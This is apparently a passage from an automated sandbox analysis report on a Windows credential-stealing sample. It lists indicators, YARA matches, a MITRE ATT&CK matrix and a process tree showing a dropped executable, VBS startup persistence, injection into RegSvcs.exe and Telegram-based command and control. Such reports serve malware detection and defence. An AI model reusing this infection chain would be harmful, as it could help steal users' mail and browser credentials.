              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: Glagolitic.exe; Binary or memory string: WIN_XP
              Source: Glagolitic.exe, 00000005.00000002.987621063.0000000000401000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
              Source: Glagolitic.exe; Binary or memory string: WIN_XPe
              Source: Glagolitic.exe; Binary or memory string: WIN_VISTA
              Source: Glagolitic.exe; Binary or memory string: WIN_7
              Source: Glagolitic.exe; Binary or memory string: WIN_8
              Source: Yara match; File source: 5.2.Glagolitic.exe.3830000.1.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 2.2.Glagolitic.exe.3c20000.1.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000006.00000002.3307267063.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: Process Memory Space: Glagolitic.exe PID: 5960, type: MEMORYSTR
              Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 4400, type: MEMORYSTR
              Source: Yara match; File source: Process Memory Space: Glagolitic.exe PID: 5168, type: MEMORYSTR
              Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 5944, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match; File source: 00000003.00000002.3309658145.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000006.00000002.3309591385.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 5.2.Glagolitic.exe.3830000.1.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 2.2.Glagolitic.exe.3c20000.1.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000006.00000002.3307267063.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: Process Memory Space: Glagolitic.exe PID: 5960, type: MEMORYSTR
              Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 4400, type: MEMORYSTR
              Source: Yara match; File source: Process Memory Space: Glagolitic.exe PID: 5168, type: MEMORYSTR
              Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 5944, type: MEMORYSTR
              Source: Yara match; File source: 5.2.Glagolitic.exe.3830000.1.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 2.2.Glagolitic.exe.3c20000.1.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000006.00000002.3307267063.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: Process Memory Space: Glagolitic.exe PID: 5960, type: MEMORYSTR
              Source: Yara match; File source: Process Memory Space: Glagolitic.exe PID: 5168, type: MEMORYSTR
              Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 5944, type: MEMORYSTR
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Code function: 2_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,2_2_004652BE
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Code function: 2_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00476619
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Code function: 2_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,2_2_0046CEF3
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Code function: 5_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,5_2_004652BE
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Code function: 5_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_00476619
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Code function: 5_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,5_2_0046CEF3

              MITRE ATT&CK Matrix (one row per table line, 14 tactic columns; a number in parentheses after a technique is the count of matching signatures)

              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | Scripting (111) | Valid Accounts (2) | Native API (2) | Scripting (111) | Exploitation for Privilege Escalation (1) | Disable or Modify Tools (11) | OS Credential Dumping (1) | System Time Discovery (2) | Remote Services | Archive Collected Data (11) | Web Service (1) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
              Credentials | Domains | Default Accounts | Scheduled Task/Job | DLL Side-Loading (1) | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (11) | Input Capture (21) | Account Discovery (1) | Remote Desktop Protocol | Data from Local System (1) | Ingress Tool Transfer (4) | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | At | Valid Accounts (2) | Valid Accounts (2) | Obfuscated Files or Information (32) | Security Account Manager | File and Directory Discovery (2) | SMB/Windows Admin Shares | Email Collection (1) | Encrypted Channel (11) | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | Registry Run Keys / Startup Folder (2) | Access Token Manipulation (21) | Software Packing (11) | NTDS | System Information Discovery (117) | Distributed Component Object Model | Input Capture (21) | Non-Standard Port (1) | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Process Injection (212) | DLL Side-Loading (1) | LSA Secrets | Security Software Discovery (221) | SSH | Clipboard Data (3) | Non-Application Layer Protocol (4) | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | Registry Run Keys / Startup Folder (2) | Masquerading (1) | Cached Domain Credentials | Virtualization/Sandbox Evasion (11) | VNC | GUI Input Capture | Application Layer Protocol (25) | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Valid Accounts (2) | DCSync | Process Discovery (2) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion (11) | Proc Filesystem | Application Window Discovery (11) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Access Token Manipulation (21) | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
              IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Process Injection (212) | Network Sniffing | System Network Configuration Discovery (1) | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
              Behavior Graph (ID: 1631785)
              Sample: mKRflLn5sx.exe, Start date: 07/03/2025, Architecture: WINDOWS, Score: 100

              Graph-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures
              Graph-level DNS/IP: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 3 other IPs or domains

              Process tree:
              mKRflLn5sx.exe (started)
                dropped: C:\Users\user\AppData\...\Glagolitic.exe (PE32)
                -> Glagolitic.exe (started)
                     dropped: C:\Users\user\AppData\...\Glagolitic.vbs (data)
                     signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Drops VBS files to the startup folder; Switches to a custom stack to bypass stack traces
                     -> RegSvcs.exe (started)
                          DNS/IP: api.telegram.org 149.154.167.220, 443, 49710, 49725 TELEGRAMRU United Kingdom; checkip.dyndns.com 193.122.6.168, 49682, 49685, 49687 ORACLE-BMC-31898US United States; 2 other IPs or domains
              wscript.exe (started)
                signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                -> Glagolitic.exe (started)
                     signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
                     -> RegSvcs.exe (started)
                          signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.